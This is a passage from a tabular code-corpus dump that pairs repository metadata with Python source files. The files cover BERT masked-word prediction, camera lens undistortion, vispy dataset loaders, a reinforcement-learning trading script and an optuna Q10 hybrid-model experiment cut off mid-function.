| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
88059d921ab4392734ab0df3051f19d38efd4fa5
| 1,131
|
py
|
Python
|
TFBertForMaskedLM/main.py
|
Sniper970119/ExampleForTransformers
|
3348525957c38b2a45898d4f4652879933503b25
|
[
"Apache-2.0"
] | 3
|
2021-01-24T04:55:46.000Z
|
2021-05-12T15:11:35.000Z
|
TFBertForMaskedLM/main.py
|
Sniper970119/ExampleForTransformers
|
3348525957c38b2a45898d4f4652879933503b25
|
[
"Apache-2.0"
] | null | null | null |
TFBertForMaskedLM/main.py
|
Sniper970119/ExampleForTransformers
|
3348525957c38b2a45898d4f4652879933503b25
|
[
"Apache-2.0"
] | 1
|
2021-01-24T04:55:53.000Z
|
2021-01-24T04:55:53.000Z
|
# -*- coding:utf-8 -*-
"""
┏┛ ┻━━━━━┛ ┻┓
┃ ┃
┃ ━ ┃
┃ ┳┛ ┗┳ ┃
┃ ┃
┃ ┻ ┃
┃ ┃
┗━┓ ┏━━━┛
┃ ┃ 神兽保佑
┃ ┃ 代码无BUG!
┃ ┗━━━━━━━━━┓
┃CREATE BY SNIPER┣┓
┃ ┏┛
┗━┓ ┓ ┏━━━┳ ┓ ┏━┛
┃ ┫ ┫ ┃ ┫ ┫
┗━┻━┛ ┗━┻━┛
"""
import tensorflow as tf
import numpy as np
for gpu in tf.config.experimental.list_physical_devices('GPU'):
tf.config.experimental.set_memory_growth(gpu, True)
from transformers import BertTokenizer, TFBertForMaskedLM
tokenizer = BertTokenizer.from_pretrained('bert-base-cased')
model = TFBertForMaskedLM.from_pretrained('bert-base-cased', return_dict=True)
inputs = tokenizer("The capital of France is [MASK].", return_tensors="tf")
outputs = model(inputs)
logits = outputs.logits
output = np.argmax(logits[0][6])
o1 = tokenizer.decode(int(output))
inputs = tokenizer("The capital of [MASK] is BeiJing.", return_tensors="tf")
outputs = model(inputs)
logits = outputs.logits
output = np.argmax(logits[0][4])
o2 = tokenizer.decode(int(output))
print()
| 21.75
| 78
| 0.546419
| 157
| 1,131
| 4.43949
| 0.484076
| 0.028694
| 0.017217
| 0.063128
| 0.364419
| 0.209469
| 0.209469
| 0.209469
| 0.209469
| 0.209469
| 0
| 0.008547
| 0.275862
| 1,131
| 51
| 79
| 22.176471
| 0.735043
| 0.227233
| 0
| 0.222222
| 0
| 0
| 0.13264
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.166667
| 0
| 0.166667
| 0.055556
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
88063bdddf555a3761172dbc965029eec4f02090
| 6,071
|
py
|
Python
|
kornia/geometry/calibration/undistort.py
|
belltailjp/kornia
|
cfa3b6823d55e276893847f1c3f06ddf108c606a
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2022-01-06T00:36:04.000Z
|
2022-01-06T00:36:04.000Z
|
kornia/geometry/calibration/undistort.py
|
belltailjp/kornia
|
cfa3b6823d55e276893847f1c3f06ddf108c606a
|
[
"ECL-2.0",
"Apache-2.0"
] | 12
|
2021-09-26T14:07:49.000Z
|
2022-03-20T14:08:08.000Z
|
kornia/geometry/calibration/undistort.py
|
belltailjp/kornia
|
cfa3b6823d55e276893847f1c3f06ddf108c606a
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
import torch
from kornia.geometry.linalg import transform_points
from kornia.geometry.transform import remap
from kornia.utils import create_meshgrid
from .distort import distort_points, tilt_projection
# Based on https://github.com/opencv/opencv/blob/master/modules/calib3d/src/undistort.dispatch.cpp#L384
def undistort_points(points: torch.Tensor, K: torch.Tensor, dist: torch.Tensor) -> torch.Tensor:
r"""Compensate for lens distortion a set of 2D image points.
Radial :math:`(k_1, k_2, k_3, k_4, k_4, k_6)`,
tangential :math:`(p_1, p_2)`, thin prism :math:`(s_1, s_2, s_3, s_4)`, and tilt :math:`(\tau_x, \tau_y)`
distortion models are considered in this function.
Args:
points: Input image points with shape :math:`(*, N, 2)`.
K: Intrinsic camera matrix with shape :math:`(*, 3, 3)`.
dist: Distortion coefficients
:math:`(k_1,k_2,p_1,p_2[,k_3[,k_4,k_5,k_6[,s_1,s_2,s_3,s_4[,\tau_x,\tau_y]]]])`. This is
a vector with 4, 5, 8, 12 or 14 elements with shape :math:`(*, n)`.
Returns:
Undistorted 2D points with shape :math:`(*, N, 2)`.
Example:
>>> _ = torch.manual_seed(0)
>>> x = torch.rand(1, 4, 2)
>>> K = torch.eye(3)[None]
>>> dist = torch.rand(1, 4)
>>> undistort_points(x, K, dist)
tensor([[[-0.1513, -0.1165],
[ 0.0711, 0.1100],
[-0.0697, 0.0228],
[-0.1843, -0.1606]]])
"""
if points.dim() < 2 and points.shape[-1] != 2:
raise ValueError(f'points shape is invalid. Got {points.shape}.')
if K.shape[-2:] != (3, 3):
raise ValueError(f'K matrix shape is invalid. Got {K.shape}.')
if dist.shape[-1] not in [4, 5, 8, 12, 14]:
raise ValueError(f"Invalid number of distortion coefficients. Got {dist.shape[-1]}")
# Adding zeros to obtain vector with 14 coeffs.
if dist.shape[-1] < 14:
dist = torch.nn.functional.pad(dist, [0, 14 - dist.shape[-1]])
# Convert 2D points from pixels to normalized camera coordinates
cx: torch.Tensor = K[..., 0:1, 2] # princial point in x (Bx1)
cy: torch.Tensor = K[..., 1:2, 2] # princial point in y (Bx1)
fx: torch.Tensor = K[..., 0:1, 0] # focal in x (Bx1)
fy: torch.Tensor = K[..., 1:2, 1] # focal in y (Bx1)
# This is equivalent to K^-1 [u,v,1]^T
x: torch.Tensor = (points[..., 0] - cx) / fx # (BxN - Bx1)/Bx1 -> BxN
y: torch.Tensor = (points[..., 1] - cy) / fy # (BxN - Bx1)/Bx1 -> BxN
# Compensate for tilt distortion
if torch.any(dist[..., 12] != 0) or torch.any(dist[..., 13] != 0):
inv_tilt = tilt_projection(dist[..., 12], dist[..., 13], True)
# Transposed untilt points (instead of [x,y,1]^T, we obtain [x,y,1])
x, y = transform_points(inv_tilt, torch.stack([x, y], dim=-1)).unbind(-1)
# Iteratively undistort points
x0, y0 = x, y
for _ in range(5):
r2 = x * x + y * y
inv_rad_poly = (1 + dist[..., 5:6] * r2 + dist[..., 6:7] * r2 * r2 + dist[..., 7:8] * r2 ** 3) / (
1 + dist[..., 0:1] * r2 + dist[..., 1:2] * r2 * r2 + dist[..., 4:5] * r2 ** 3
)
deltaX = (
2 * dist[..., 2:3] * x * y
+ dist[..., 3:4] * (r2 + 2 * x * x)
+ dist[..., 8:9] * r2
+ dist[..., 9:10] * r2 * r2
)
deltaY = (
dist[..., 2:3] * (r2 + 2 * y * y)
+ 2 * dist[..., 3:4] * x * y
+ dist[..., 10:11] * r2
+ dist[..., 11:12] * r2 * r2
)
x = (x0 - deltaX) * inv_rad_poly
y = (y0 - deltaY) * inv_rad_poly
# Convert points from normalized camera coordinates to pixel coordinates
x = fx * x + cx
y = fy * y + cy
return torch.stack([x, y], -1)
# Based on https://github.com/opencv/opencv/blob/master/modules/calib3d/src/undistort.dispatch.cpp#L287
def undistort_image(image: torch.Tensor, K: torch.Tensor, dist: torch.Tensor) -> torch.Tensor:
r"""Compensate an image for lens distortion.
Radial :math:`(k_1, k_2, k_3, k_4, k_4, k_6)`,
tangential :math:`(p_1, p_2)`, thin prism :math:`(s_1, s_2, s_3, s_4)`, and tilt :math:`(\tau_x, \tau_y)`
distortion models are considered in this function.
Args:
image: Input image with shape :math:`(*, C, H, W)`.
K: Intrinsic camera matrix with shape :math:`(*, 3, 3)`.
dist: Distortion coefficients
:math:`(k_1,k_2,p_1,p_2[,k_3[,k_4,k_5,k_6[,s_1,s_2,s_3,s_4[,\tau_x,\tau_y]]]])`. This is
a vector with 4, 5, 8, 12 or 14 elements with shape :math:`(*, n)`.
Returns:
Undistorted image with shape :math:`(*, C, H, W)`.
Example:
>>> img = torch.rand(1, 3, 5, 5)
>>> K = torch.eye(3)[None]
>>> dist_coeff = torch.rand(4)
>>> out = undistort_image(img, K, dist_coeff)
>>> out.shape
torch.Size([1, 3, 5, 5])
"""
if len(image.shape) < 2:
raise ValueError(f"Image shape is invalid. Got: {image.shape}.")
if K.shape[-2:] != (3, 3):
raise ValueError(f'K matrix shape is invalid. Got {K.shape}.')
if dist.shape[-1] not in [4, 5, 8, 12, 14]:
raise ValueError(f'Invalid number of distortion coefficients. Got {dist.shape[-1]}.')
if not image.is_floating_point():
raise ValueError(f'Invalid input image data type. Input should be float. Got {image.dtype}.')
B, _, rows, cols = image.shape
# Create point coordinates for each pixel of the image
xy_grid: torch.Tensor = create_meshgrid(rows, cols, False, image.device, image.dtype)
pts = xy_grid.reshape(-1, 2) # (rows*cols)x2 matrix of pixel coordinates
# Distort points and define maps
ptsd: torch.Tensor = distort_points(pts, K, dist) # Bx(rows*cols)x2
mapx: torch.Tensor = ptsd[..., 0].reshape(B, rows, cols) # B x rows x cols, float
mapy: torch.Tensor = ptsd[..., 1].reshape(B, rows, cols) # B x rows x cols, float
# Remap image to undistort
out = remap(image, mapx, mapy, align_corners=True)
return out
| 39.679739
| 109
| 0.567452
| 954
| 6,071
| 3.519916
| 0.205451
| 0.058964
| 0.030971
| 0.008338
| 0.419297
| 0.402621
| 0.379393
| 0.366885
| 0.366885
| 0.366885
| 0
| 0.06257
| 0.260254
| 6,071
| 152
| 110
| 39.940789
| 0.685148
| 0.447373
| 0
| 0.092308
| 0
| 0
| 0.116677
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.030769
| false
| 0
| 0.076923
| 0
| 0.138462
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8808d379a8ce975e29508dea21a42397452fc552
| 2,489
|
py
|
Python
|
vispy/io/datasets.py
|
hmaarrfk/vispy
|
7f3f6f60c8462bb8a3a8fa03344a2e6990b86eb2
|
[
"BSD-3-Clause"
] | 2,617
|
2015-01-02T07:52:18.000Z
|
2022-03-29T19:31:15.000Z
|
vispy/io/datasets.py
|
hmaarrfk/vispy
|
7f3f6f60c8462bb8a3a8fa03344a2e6990b86eb2
|
[
"BSD-3-Clause"
] | 1,674
|
2015-01-01T00:36:08.000Z
|
2022-03-31T19:35:56.000Z
|
vispy/io/datasets.py
|
hmaarrfk/vispy
|
7f3f6f60c8462bb8a3a8fa03344a2e6990b86eb2
|
[
"BSD-3-Clause"
] | 719
|
2015-01-10T14:25:00.000Z
|
2022-03-02T13:24:56.000Z
|
# -*- coding: utf-8 -*-
# Copyright (c) Vispy Development Team. All Rights Reserved.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
import numpy as np
from os import path as op
from ..util import load_data_file
# This is the package data dir, not the dir for config, etc.
DATA_DIR = op.join(op.dirname(__file__), '_data')
def load_iris():
"""Load the iris dataset
Returns
-------
iris : NpzFile
data['data'] : a (150, 4) NumPy array with the iris' features
data['group'] : a (150,) NumPy array with the iris' group
"""
return np.load(load_data_file('iris/iris.npz',
force_download='2014-09-04'))
def load_crate():
"""Load an image of a crate
Returns
-------
crate : array
256x256x3 crate image.
"""
return np.load(load_data_file('orig/crate.npz'))['crate']
def pack_unit(value):
"""Packs float values between [0,1] into 4 unsigned int8
Returns
-------
pack: array
packed interpolation kernel
"""
pack = np.zeros(value.shape + (4,), dtype=np.ubyte)
for i in range(4):
value, pack[..., i] = np.modf(value * 256.)
return pack
def pack_ieee(value):
"""Packs float ieee binary representation into 4 unsigned int8
Returns
-------
pack: array
packed interpolation kernel
"""
return np.fromstring(value.tobytes(),
np.ubyte).reshape((value.shape + (4,)))
def load_spatial_filters(packed=True):
"""Load spatial-filters kernel
Parameters
----------
packed : bool
Whether or not the data should be in "packed" representation
for use in GLSL code.
Returns
-------
kernel : array
16x1024x4 (packed float in rgba) or
16x1024 (unpacked float)
16 interpolation kernel with length 1024 each.
names : tuple of strings
Respective interpolation names, plus "Nearest" which does
not require a filter but can still be used
"""
names = ("Bilinear", "Hanning", "Hamming", "Hermite",
"Kaiser", "Quadric", "Bicubic", "CatRom",
"Mitchell", "Spline16", "Spline36", "Gaussian",
"Bessel", "Sinc", "Lanczos", "Blackman", "Nearest")
kernel = np.load(op.join(DATA_DIR, 'spatial-filters.npy'))
if packed:
# convert the kernel to a packed representation
kernel = pack_unit(kernel)
return kernel, names
| 26.2
| 73
| 0.60225
| 313
| 2,489
| 4.722045
| 0.485623
| 0.016238
| 0.024357
| 0.023004
| 0.139378
| 0.110961
| 0.078484
| 0.078484
| 0.078484
| 0.078484
| 0
| 0.032009
| 0.271997
| 2,489
| 94
| 74
| 26.478723
| 0.783664
| 0.482925
| 0
| 0
| 0
| 0
| 0.166968
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.192308
| false
| 0
| 0.115385
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8809a9e20076798a2ad0ec40dc57152d0a032e41
| 13,731
|
py
|
Python
|
universal_portfolio/knapsack.py
|
jehung/universal_portfolio
|
de731a6166ff057c8d6f3f73f80f9aca151805fa
|
[
"CC-BY-3.0"
] | 14
|
2017-03-01T07:54:17.000Z
|
2021-10-10T11:07:56.000Z
|
universal_portfolio/knapsack.py
|
jehung/universal_portfolio
|
de731a6166ff057c8d6f3f73f80f9aca151805fa
|
[
"CC-BY-3.0"
] | null | null | null |
universal_portfolio/knapsack.py
|
jehung/universal_portfolio
|
de731a6166ff057c8d6f3f73f80f9aca151805fa
|
[
"CC-BY-3.0"
] | 3
|
2017-06-27T10:18:03.000Z
|
2020-07-03T01:29:56.000Z
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import numpy as np
np.random.seed(1335) # for reproducibility
np.set_printoptions(precision=5, suppress=True, linewidth=150)
import os
import pandas as pd
import backtest as twp
from matplotlib import pyplot as plt
from sklearn import metrics, preprocessing
from talib.abstract import *
from sklearn.externals import joblib
import quandl
import random, timeit
from sklearn import preprocessing
from keras.models import Sequential
from keras.layers.core import Dense, Dropout, Activation
from keras.layers.recurrent import LSTM
from keras.optimizers import RMSprop, Adam
'''
Name: The Self Learning Quant, Example 3
Author: Daniel Zakrisson
Created: 30/03/2016
Copyright: (c) Daniel Zakrisson 2016
Licence: BSD
Requirements:
Numpy
Pandas
MatplotLib
scikit-learn
TA-Lib, instructions at https://mrjbq7.github.io/ta-lib/install.html
Keras, https://keras.io/
Quandl, https://www.quandl.com/tools/python
backtest.py from the TWP library. Download backtest.py and put in the same folder
/plt create a subfolder in the same directory where plot files will be saved
'''
def get_ticker(x):
return x.split('/')[-1].split('.')[0]
def read_file(file, test=None):
scaler = preprocessing.MinMaxScaler()
d = pd.read_csv(file).set_index('Date')
d.fillna(0, inplace=True)
ticker = get_ticker(file)
d['ticker'] = ticker
d.rename(columns={'Open': 'open', 'High': 'high', 'Low': 'low', 'Close': 'close', 'Adj Close': 'adj_close',
'Volume (BTC)': 'volume'},
inplace=True)
x_train = d.iloc[:-100, ]
x_test = d.iloc[-100:, ]
if test:
return x_test, ticker
else:
return x_train, ticker
# Initialize first state, all items are placed deterministically
def init_state(file, test):
d, ticker = read_file(file, test=test)
xdata = pd.DataFrame()
scaler = preprocessing.StandardScaler()
xdata['adj_close'] = d['adj_close'] # .values
xdata['diff'] = xdata['adj_close'].diff(periods=1)
xdata['diff'].fillna(0, inplace=True)
xdata['sma15'] = SMA(d, timeperiod=15)
xdata['sma60'] = SMA(d, timeperiod=60)
xdata['rsi'] = RSI(d, timeperiod=14)
xdata['atr'] = ATR(d, timeperiod=14)
xdata.fillna(0, inplace=True)
# --- Preprocess data
# xdata = np.column_stack((close, diff, sma15, close - sma15, sma15 - sma60, rsi, atr))
xdata = pd.DataFrame(scaler.fit_transform(xdata), columns=xdata.columns)
xdata['ticker'] = ticker
pivot_columns = xdata.columns[0:-1]
pivot = xdata.pivot_table(index=d.index, columns='ticker', values=pivot_columns) # Make a pivot table from the data
pivot.columns = [s1 + '-' + s2 for (s1, s2) in pivot.columns.tolist()]
return pivot
def all_init_data(test=False):
filepath = 'util/stock_dfs/'
all = []
scaler = preprocessing.StandardScaler()
for f in os.listdir(filepath):
datapath = os.path.join(filepath, f)
if datapath.endswith('.csv'):
# print(datapath)
Res = init_state(datapath, test=test)
all.append(Res)
all = pd.concat(all, axis=1)
all.fillna(0, inplace=True)
closecol = [col for col in all.columns if 'adj_close' in col]
close = all[closecol].values
# xdata = np.column_stack((close, diff, sma15, close-sma15, sma15-sma60, rsi, atr))
xdata = np.vstack(all.values)
xdata = np.nan_to_num(xdata)
if test == False:
scaler = preprocessing.StandardScaler()
xdata = np.expand_dims(scaler.fit_transform(xdata), axis=1)
joblib.dump(scaler, 'data/scaler.pkl')
else:
scaler = joblib.load('data/scaler.pkl')
xdata = np.expand_dims(scaler.fit_transform(xdata), axis=1)
state = xdata[0:1, 0:1, :]
return state, xdata, close
# Take Action
def take_action(state, xdata, action, signal, time_step):
# this should generate a list of trade signals that at evaluation time are fed to the backtester
# the backtester should get a list of trade signals and a list of price data for the assett
# make necessary adjustments to state and then return it
time_step += 1
# if the current iteration is the last state ("terminal state") then set terminal_state to 1
if time_step + 1 == xdata.shape[0]:
state = xdata[time_step - 1:time_step, 0:1, :]
terminal_state = 1
signal.loc[time_step] = 0
return state, time_step, signal, terminal_state
# move the market data window one step forward
state = xdata[time_step - 1:time_step, 0:1, :]
# take action
if action == 1:
signal.loc[time_step] = 100
elif action == 2:
signal.loc[time_step] = -100
else:
signal.loc[time_step] = 0
# print(state)
terminal_state = 0
# print(signal)
return state, time_step, signal, terminal_state
# Get Reward, the reward is returned at the end of an episode
def get_reward(new_state, time_step, action, xdata, signal, terminal_state, eval=False, epoch=0):
reward = 0
signal.fillna(value=0, inplace=True)
if eval == False:
try:
bt = twp.Backtest(pd.Series(data=[x[0] for x in xdata[time_step - 2:time_step]], index=signal[time_step - 2:time_step].index.values),
signal[time_step - 2:time_step], signalType='shares')
reward = np.max((bt.data['price'].iloc[-1] - bt.data['price'].iloc[-2]) * bt.data['shares'].iloc[-1])
except:
pass
if terminal_state == 1 and eval == True:
bt = twp.Backtest(pd.Series(data=[x[0] for x in xdata], index=signal.index.values), signal, signalType='shares')
reward = bt.pnl.iloc[-1]
plt.figure(figsize=(9, 16))
bt.plotTrades()
plt.axvline(x=400, color='black', linestyle='--')
plt.text(250, 400, 'training data')
plt.text(450, 400, 'test data')
plt.suptitle(str(epoch))
plt.savefig('plt/' + 'knapsack_' + str(epoch) + '.png')
plt.close('all')
'''
# save a figure of the test set
plt.figure(figsize=(10, 25))
for i in range(xdata.T.shape[0]):
#frame = pd.concat(btFrame, axis=1)
bt = twp.Backtest(pd.Series(data=[x for x in xdata.T[i]], index=signal.index.values), signal, signalType='shares')
reward += np.max(bt.pnl.iloc[-1])
bt.plotTrades()
#plt.axvline(x=400, color='black', linestyle='--')
#plt.text(250, 400, 'training data')
#plt.text(450, 400, 'test data')
#plt.suptitle(str(epoch))
plt.savefig('plt/' + 'knapsack_' + str(epoch) + '.png', bbox_inches='tight', pad_inches=1, dpi=72)
plt.close('all')
'''
# print(time_step, terminal_state, eval, reward)
return reward
def evaluate_Q(eval_data, eval_model, epoch=0):
# This function is used to evaluate the performance of the system each epoch, without the influence of epsilon and random actions
signal = pd.Series(index=np.arange(len(eval_data)))
state, xdata, price_data = all_init_data()
status = 1
terminal_state = 0
time_step = 1
while (status == 1):
# We start in state S
qval = eval_model.predict(state, batch_size=batch_size)
action = (np.argmax(qval))
# Take action, observe new state S'
new_state, time_step, signal, terminal_state = take_action(state, xdata, action, signal, time_step)
# Observe reward
eval_reward = get_reward(new_state, time_step, action, price_data, signal, terminal_state, eval=True,
epoch=epoch)
state = new_state
if terminal_state == 1: # terminal state
status = 0
return eval_reward
if __name__ == "__main__":
# This neural network is the the Q-function, run it like this:
# model.predict(state.reshape(1,64), batch_size=1)
batch_size = 7
num_features = 2544
epochs = 3
gamma = 0.95 # since the reward can be several time steps away, make gamma high
epsilon = 1
batchSize = 100
buffer = 200
replay = []
learning_progress = []
model = Sequential()
model.add(LSTM(64,
input_shape=(1, num_features),
return_sequences=True,
stateful=False))
model.add(Dropout(0.5))
model.add(LSTM(64,
input_shape=(1, num_features),
return_sequences=False,
stateful=False))
model.add(Dropout(0.5))
model.add(Dense(4, init='lecun_uniform'))
model.add(Activation('linear')) # linear output so we can have range of real-valued outputs
rms = RMSprop()
adam = Adam()
model.compile(loss='mse', optimizer=adam)
start_time = timeit.default_timer()
# read_convert_data(symbol='XBTEUR') #run once to read indata, resample and convert to pickle
astate, xdata, aprice_data = all_init_data()
bstate, test_data, test_price_data = all_init_data(test=True)
'''
bstate, test_data, test_price_data = all_init_data(test=True)
print(astate.shape)
print(bstate.shape)
print(xdata.shape)
print(test_data.shape)
print(price_data.shape)
print(test_price_data.shape)
'''
# stores tuples of (S, A, R, S')
h = 0
# signal = pd.Series(index=market_data.index)
signal = pd.Series(index=np.arange(len(xdata)))
for i in range(epochs):
if i == epochs - 1: # the last epoch, use test data set
state, xdata, price_data = all_init_data()
else:
state, xdata, price_data = all_init_data(test=True)
status = 1
terminal_state = 0
time_step = 5
# while game still in progress
while (status == 1):
# We are in state S
# Let's run our Q function on S to get Q values for all possible actions
print('epoch ' + str(i))
qval = model.predict(state, batch_size=batch_size)
if (random.random() < epsilon): # choose random action
action = np.random.randint(0, 4) # assumes 4 different actions
else: # choose best action from Q(s,a) values
action = (np.argmax(qval))
# Take action, observe new state S'
new_state, time_step, signal, terminal_state = take_action(state, xdata, action, signal, time_step)
# Observe reward
reward = get_reward(new_state, time_step, action, price_data, signal, terminal_state)
print('new_state', new_state)
print('reward', reward)
# Experience replay storage
if (len(replay) < buffer): # if buffer not filled, add to it
replay.append((state, action, reward, new_state))
# print(time_step, reward, terminal_state)
else: # if buffer full, overwrite old values
if (h < (buffer - 1)):
h += 1
else:
h = 0
replay[h] = (state, action, reward, new_state)
# randomly sample our experience replay memory
minibatch = random.sample(replay, batchSize)
X_train = []
y_train = []
for memory in minibatch:
# Get max_Q(S',a)
old_state, action, reward, new_state = memory
old_qval = model.predict(old_state, batch_size=batch_size)
newQ = model.predict(new_state, batch_size=batch_size)
maxQ = np.max(newQ)
y = np.zeros((1, 4))
y[:] = old_qval[:]
if terminal_state == 0: # non-terminal state
update = (reward + (gamma * maxQ))
else: # terminal state
update = reward
# print('rewardbase', reward)
# print('update', update)
y[0][action] = update
# print(time_step, reward, terminal_state)
X_train.append(old_state)
y_train.append(y.reshape(4, ))
X_train = np.squeeze(np.array(X_train), axis=(1))
y_train = np.array(y_train)
model.fit(X_train, y_train, batch_size=batchSize, epochs=100, verbose=0)
state = new_state
if terminal_state == 1: # if reached terminal state, update epoch status
status = 0
eval_reward = evaluate_Q(test_data, model, i)
# eval_reward = value_iter(test_data, epsilon, epochs)
learning_progress.append(eval_reward)
print("Epoch #: %s Reward: %f Epsilon: %f" % (i, eval_reward, epsilon))
# learning_progress.append((reward))
if epsilon > 0.1: # decrement epsilon over time
epsilon -= (1.0 / epochs)
elapsed = np.round(timeit.default_timer() - start_time, decimals=2)
print("Completed in %f" % (elapsed,))
bt = twp.Backtest(pd.Series(data=[x[0] for x in test_price_data]), signal, signalType='shares')
bt.data['delta'] = bt.data['shares'].diff().fillna(0)
print(bt.data)
bt.data.to_csv('plt/knapsack_data.csv')
unique, counts = np.unique(filter(lambda v: v == v, signal.values), return_counts=True)
print(np.asarray((unique, counts)).T)
plt.figure()
plt.subplot(3, 1, 1)
bt.plotTrades()
plt.subplot(3, 1, 2)
bt.pnl.plot(style='x-')
plt.subplot(3, 1, 3)
plt.plot(learning_progress)
print('to plot', learning_progress)
plt.savefig('plt/knapsack_summary' + '.png', bbox_inches='tight', pad_inches=1, dpi=72)
plt.show()
| 36.134211
| 145
| 0.610516
| 1,841
| 13,731
| 4.435633
| 0.23031
| 0.03037
| 0.009429
| 0.011021
| 0.296228
| 0.267205
| 0.24602
| 0.187607
| 0.170463
| 0.155033
| 0
| 0.023539
| 0.269827
| 13,731
| 379
| 146
| 36.229551
| 0.790944
| 0.165247
| 0
| 0.212766
| 0
| 0
| 0.045692
| 0.002109
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029787
| false
| 0.004255
| 0.068085
| 0.004255
| 0.13617
| 0.042553
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
880a98e6cfdd279e5621d17d6384a4912cab6353
| 7,165
|
py
|
Python
|
experiments/experiment_01.py
|
bask0/q10hybrid
|
9b18af9dd382c65dd667139f97e7da0241091a2c
|
[
"Apache-2.0"
] | 2
|
2021-05-05T13:37:58.000Z
|
2021-05-05T15:11:07.000Z
|
experiments/experiment_01.py
|
bask0/q10hybrid
|
9b18af9dd382c65dd667139f97e7da0241091a2c
|
[
"Apache-2.0"
] | null | null | null |
experiments/experiment_01.py
|
bask0/q10hybrid
|
9b18af9dd382c65dd667139f97e7da0241091a2c
|
[
"Apache-2.0"
] | 1
|
2021-11-23T18:13:08.000Z
|
2021-11-23T18:13:08.000Z
|
import pytorch_lightning as pl
import optuna
import xarray as xr
from pytorch_lightning.callbacks.early_stopping import EarlyStopping
from pytorch_lightning.callbacks.model_checkpoint import ModelCheckpoint
import os
import shutil
from argparse import ArgumentParser
from datetime import datetime
from project.fluxdata import FluxData
from models.hybrid import Q10Model
# Hardcoded `Trainer` args. Note that these cannot be passed via cli.
TRAINER_ARGS = dict(
max_epochs=100,
log_every_n_steps=1,
weights_summary=None
)
class Objective(object):
def __init__(self, args):
self.args = args
def __call__(self, trial: optuna.trial.Trial) -> float:
q10_init = trial.suggest_float('q10_init', 0.0001, 1000.)
seed = trial.suggest_int('seed', 0, 999999999999)
use_ta = trial.suggest_categorical('use_ta', [True, False])
dropout = trial.suggest_float('dropout', 0.0, 1.0)
if use_ta:
features = ['sw_pot', 'dsw_pot', 'ta']
else:
features = ['sw_pot', 'dsw_pot']
pl.seed_everything(seed)
# Further variables used in the hybrid model.
physical = ['ta']
# Target (multiple targets not possible currently).
targets = ['reco']
# Find variables that are only needed in physical model but not in NN.
physical_exclusive = [v for v in physical if v not in features]
# ------------
# data
# ------------
ds = xr.open_dataset(self.args.data_path)
fluxdata = FluxData(
ds,
features=features + physical_exclusive,
targets=targets,
context_size=1,
train_time=slice('2003-01-01', '2006-12-31'),
valid_time=slice('2007-01-01', '2007-12-31'),
test_time=slice('2008-01-01', '2008-12-31'),
batch_size=self.args.batch_size,
data_loader_kwargs={'num_workers': 4})
train_loader = fluxdata.train_dataloader()
val_loader = fluxdata.val_dataloader()
test_loader = fluxdata.test_dataloader()
# Create empty xr.Dataset, will be used by the model to save predictions every epoch.
max_epochs = TRAINER_ARGS['max_epochs']
ds_pred = fluxdata.target_xr('valid', varnames=['reco', 'rb'], num_epochs=max_epochs)
# ------------
# model
# ------------
model = Q10Model(
features=features,
targets=targets,
norm=fluxdata._norm,
ds=ds_pred,
q10_init=q10_init,
hidden_dim=self.args.hidden_dim,
num_layers=self.args.num_layers,
learning_rate=self.args.learning_rate,
dropout=dropout,
weight_decay=self.args.weight_decay,
num_steps=len(train_loader) * max_epochs)
# ------------
# training
# ------------
trainer = pl.Trainer.from_argparse_args(
self.args,
default_root_dir=self.args.log_dir,
**TRAINER_ARGS,
callbacks=[
EarlyStopping(
monitor='valid_loss',
patience=10,
min_delta=0.00001),
ModelCheckpoint(
filename='{epoch}-{val_loss:.2f}',
save_top_k=1,
verbose=False,
monitor='valid_loss',
mode='min',
prefix=model.__class__.__name__)
])
trainer.fit(model, train_loader, val_loader)
# ------------
# testing
# ------------
# trainer.test(test_dataloaders=test_loader)
# ------------
# save results
# ------------
# Store predictions.
ds = fluxdata.add_scalar_record(model.ds, varname='q10', x=model.q10_history)
trial.set_user_attr('q10', ds.q10[-1].item())
# Add some attributes that are required for analysis.
ds.attrs = {
'created': datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
'author': 'bkraft@bgc-jena.mpg.de',
'q10_init': q10_init,
'dropout': dropout,
'use_ta': int(use_ta),
'loss': trainer.callback_metrics['valid_loss'].item()
}
ds = ds.isel(epoch=slice(0, trainer.current_epoch + 1))
# Save data.
save_dir = os.path.join(model.logger.log_dir, 'predictions.nc')
print(f'Saving predictions to: {save_dir}')
ds.to_netcdf(save_dir)
return trainer.callback_metrics['valid_loss'].item()
@staticmethod
def add_project_specific_args(parent_parser: ArgumentParser) -> ArgumentParser:
parser = ArgumentParser(parents=[parent_parser], add_help=False)
parser.add_argument(
'--batch_size', default=240, type=int)
parser.add_argument(
'--data_path', default='./data/Synthetic4BookChap.nc', type=str)
parser.add_argument(
